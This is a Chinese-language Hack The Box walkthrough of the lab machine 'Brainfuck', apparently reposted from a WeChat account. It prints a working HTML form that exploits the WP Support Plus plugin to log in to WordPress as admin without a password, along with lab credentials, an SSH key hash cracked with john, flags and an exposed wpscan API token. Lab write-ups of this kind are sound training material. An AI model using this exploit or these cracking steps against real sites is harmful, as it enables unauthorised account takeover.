0x01 信息收集与探索
使用Nmap对目标地址进行端口嗅探,发现开放22、25、110、143、443端口。
访问https://10.129.36.235/,为空白页面。
使用dirsearch对其进行扫描,未发现有价值的页面。
查看证书信息,发现存在四个有关域名的信息:
brainfuck.htb Common Namesorestis@brainfuck.htb Email Addresssup3rs3cr3t.brainfuck.htb DNS Namewww.brainfuck.htb DNS Name
将域名信息添加至hosts文件中。
访问https://sup3rs3cr3t.brainfuck.htb/如下:
访问https://brainfuck.htb/页面如下:
使用Dirsearch对其进行目录扫描,发现大量wordpress相关目录页面。
发现登录页:https://brainfuck.htb/wp-login.php
发现存在[email protected]、admin账户。
使用wpscan对网站进行漏洞扫描,发现wp-support-plus-responsive-ticket-system插件存在版本过时。
wpscan --url "https://brainfuck.htb/" --disable-tls-checks
使用searchsploit工具搜索相关漏洞,存在以下三个漏洞,复制到桌面查看,发现有一个特权升级的漏洞,接下来根据描述及漏洞复现文档进行漏洞利用。
在桌面新建一个“wp.html”的文件,将“41006.txt”文档中的利用代码放进去并保存,注意设置“action=”为靶机地址的“/wp-admin/admin-ajax.php”文件。
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">Username: <input type="text" name="username" value="admin"><input type="hidden" name="email" value="sth"><input type="hidden" name="action" value="loginGuestFacebook"><input type="submit" value="Login"></form>
运行“wp.html”文件,设置username为“admin”,点击“Login”,页面跳转至“https://brainfuck.htb/wp-admin/admin-ajax.php”,去除后缀访问首页“https://brainfuck.htb/”,发现右上角已是admin的登录状态。
靶机是真的卡,终于在https://brainfuck.htb/wp-admin/options-general.php?page=swpsmtp_settings发现了[email protected]邮箱及密码,想到靶机还开放25、110端口,下一步便去利用。
orestiskHGuERB29DNiN
登录orestis邮箱查看邮件信息,发现新的用户凭据。
orestiskIEnnfEKJ#9Umd
尝试用新的用户凭据进行ssh远程登录,提示key不起作用,拒绝连接。
回头检查,看到邮件中有“secret”,与“https://sup3rs3cr3t.brainfuck.htb/”中“secret”字段呼应,尝试用登录凭据进行登录,发现成功登录。
然而,所有消息都是乱码,用百度翻译未能显示正常,尝试使用各种解密方式还是无果。
缴械投降,查看官方writeup才知道用了“Vigenère”维吉尼亚加密,使用它提供的工具才解开,得到明文的id_rsa下载地址。
密钥:fuckmybrainThere you go you stupid fuck, I hope you remember your key password because I dont :)https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
0x02 获取权限
访问https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa,下载私钥文件。使用私钥文件登录靶机,提示拒绝登录,需要输入私钥的密码。
使用ssh2jhon破解私钥,得到私钥信息,将其保存在hash文件中。
id_rsa:$sshng$1$16$6904FEF19397786F75BE2D7762AE7382$1200$9a779a83f60263c001f8e2ddae0b722aa9eb7531f09a95864cd5bda5f847b0dcfc09f19d03181c8546877a84e3feb87f0769d2e3ef426012bc211dd5b79168ecfa160428c0030598971f9c2b4c350d7a9adc0f812e5b122342b0b3d8de6ba1a25b599afd5ed6a0927e57824d23bb9f4e143238450eefa3e560d44cf54105f0c00d42624adfb31df44ceee77c09a54a99edd29c83a00cfe8f5584e969897ed220d4fd75129a29ebce8e8a516f210532588fd351fb6656a158f7514667c25d2990cf11fd2369462104ed451037ac592d2e935e74d3ee650092b3051e73b79556dda673666ff4f33d9424c9b914b3cd5ba6a33dd712785a1a63f58e63285415a20fed91ae72fac27cfd92cb15fad802574983f7b592fb5c9d5843de0a9874e8c7a674b4762f5baf04625ebfc8bd84fded869d68c2f33c1e089dc9f302daf381bd76dc000ddb0cabd1e23b33da86dfe4017e16fb7aa6632e8b1f216e2a4fd75d94b39e324effe1c82f8ce60d61594ba3e72e31a2f82bd0b2df236a467be16fe655d399cce773566a0d8e65ae5996cd3bec5bb87bae6f4b2a01221e7f601a0aa23a544a9f915497e0e57da00c1d689850a62c2d2315bc323ac3cf2065bd74d8a0f6938355d0fe8e7572022403046b59923a4fcb4bf98b3b87b4377c045fe36d8156eaba5f60b929686dab085f90e401c63e111de3fbf61e7e9c849d8b3efed7d34f5a0cf814774d54a525c3abbcd9ab232e7d92b295b6e97101e8d5433c489963940d80bde3b4d7bbd040b21d0c2e82ada4844bdc771bbbebe2f4be679f92e484efd581d3323b2013a2bec09aedb16fddce3b9e572a4075962c36ae55a0eac0695ccd56520a0c416e7429ea3a3b48f37867c057098cef65db6ae82684a5b6e6aff8ebfc8be1530ab83c872f91dcf8ebf9bf76d0f74f29f94adfd38769be3f528c1ce7b1c86aa33a20702d547c97029ba725fbdebb18505adeb0f9603a77c76c72215f5241dc06bc7d1921ca7474a2a431566d517f214eabf544e4780a4f06d7333a59ce10a87e8352a1a2dedafb9d8c32ef0c75249e96461a7259d2feb2ef1ff7a2a717b83064bb553fceddf11dee0044599f114ef4cb8e654dbe3c49c35dd48248cbf7a97f45bcf618dce3ca6ecc62032f8cc197b32cd8a9f345e671527019462c767fa207f50f31d757d76277d1851bb70fd1df84d08911548562d316b98e68b69b22a9792fed0911b799f4ee7a0da5c5a8fde05e1331f3104a5106b1d9ec684eb7a8c42239edac41401a9384483f1d30b22103e61d6dfa9b1b5cf8894c0c4c5d2c7583ee69cdb88752862011e9b5d861233713bdb97f32c4d4c16ee395641c38859b1cbd11543ebf8f64838c85c1434f3dbb0ea6929cee0256a52d58fe2fab0ca83c64d5774c86f94c0a88a9046066aa4f0af7cf46998b511427be5cbcf575fdec918945218985b002a943199dfc05a7167c68fb15c2ca17472bae6f8ddaec6b45f438b209b846b85db361c98a8d1e4438e4fb1ec82a40870038c216e79ab6149a6a1f5f8f53c7887c5ce4854634aa819210116466e08fcae8d8393caf4197b0c9df9ac7bdc7388ed91e8cbc0b10e48d26c85f200bc806bb229dda81db4e3e79a2ea10fe8f1bdba71160f2281db59961f4fb1f22090d64af11aa73f29803c2caf466f1ceef6451f84b04200f91574f0190使用john继续对hash文件进行破解,获取到私钥id_rsa的口令信息。
3poulakia!使用私钥文件id_rsa和私钥口令信息登录靶机,成功获取user.txt。
a4755871044135535d25d28cf0d806430x03 权限提升
查看debug.txt、output.txt、encrypt.sage文件,发现还是密码学相关知识。由于靶场为退休机器,所以尝试使用最近的Linux提权漏洞进行提权,均未提权成功。
Linux DirtyPipe权限提升漏洞 (CVE-2022-0847)
Linux Polkit本地权限提升漏洞提权(CVE-2021-4034)
无奈只能分析密码学文档,根据writeup得到写好的脚本:
https://crypto.stackexchange.com/a/1953替换p、q、e为debug.txt中的信息,替换ct为output.txt中的信息。运行后获取到pt字段。
解码后获取flag。
6efc1a5dbb8904751ce6566a305bb8ef0x04 攻击路径
0x05 知识点总结
5.1 wpscan工具使用
WPScan是专门检查WordPress网站漏洞的工具,它可以全面检查wp网站的漏洞,例如插件,主题,备份文件等,有助于我们增加网站安全防护。类似我这种个人建个站,也可以通过WPScan来检查自己网站的漏洞,但是切记不要对别人的网站发起攻击。
注:收费软件,默认没有apikey的话,只能进行较为模糊的扫描。可以在https://wpscan.com/register注册,获取apikey。
wpscan --update # 升级wpscan# 常用参数:- -url # 扫描站点-e vp # 扫描插件漏洞-e ap # 扫描所有插件-e vt # 扫描主题漏洞-e at # 扫描所有主题-U # 爆破用户-P # 爆破密码- -api-token # 添加api--disable-tls-checks # 禁用 SSL/TLS 证书验证# 用法:wpscan --url "https://brainfuck.htb/"wpscan --url "https://brainfuck.htb/" --disable-tls-checkswpscan --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8 --url "https://brainfuck.htb/" -e vp
5.2 Pop3命令及使用
POP3,全名为“Post Office Protocol - Version 3”,即“邮局协议版本3”。是TCP/IP协议族中的一员,由RFC1939 定义。本协议主要用于支持使用客户端远程管理在服务器上的电子邮件。提供了SSL加密的POP3协议被称为POP3S。
POP 协议支持“离线”邮件处理。其具体过程是:邮件发送到服务器上,电子邮件客户端调用邮件客户机程序以连接服务器,并下载所有未阅读的电子邮件。这种离线访问模式是一种存储转发服务,将邮件从邮件服务器端送到个人终端机器上,一般是PC机或 MAC。一旦邮件发送到 PC 机或MAC上,邮件服务器上的邮件将会被删除。但POP3邮件服务器大都可以“只下载邮件,服务器端并不删除”,也就是改进的POP3协议。
5.2.1 常用命令
USER username # 认证用户名。PASS password # 认证密码认证,认证通过则状态转换。APOP name,digest # 认可一种安全传输口令的办法,执行成功导致状态转换STAT # 回送邮箱统计资料,如邮件数、 邮件总字节数。UIDL n # 返回用于该指定邮件的唯一标识, 如果没有指定,返回所有的。LIST n # 返回指定邮件的大小等,如果没有指定,返回所有的。RETR n # 返回邮件的全部文本,如果没有指定,返回所有的。DELE n # 删除,QUIT 命令执行时才真正删除。RSET # 撤消所有的 DELE 命令。TOP n,m # 返回 n 号邮件的前 m 行内容,m 必须是自然数。NOOP # 返回一个肯定的响应。QUIT # 结束会话。
5.2.2 连接方式
otelnet
onetcat
5.3 id_rsa加密文件处理方式
5.3.1 使用ssh2john对id_rsa进行破解,得到hash
Ssh2john 是 John The Reaper 套件的一部分。这是一个脚本,它基本上将 [RSA/DSA/EC/OPENSSH (SSH private keys) ] 私钥转换为 john 格式,以便以后使用 JtR 进行破解。
5.3.2 使用john破解hash
原文始发于微信公众号(Matrix1024):HTB靶场系列之Brainfuck通关攻略
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论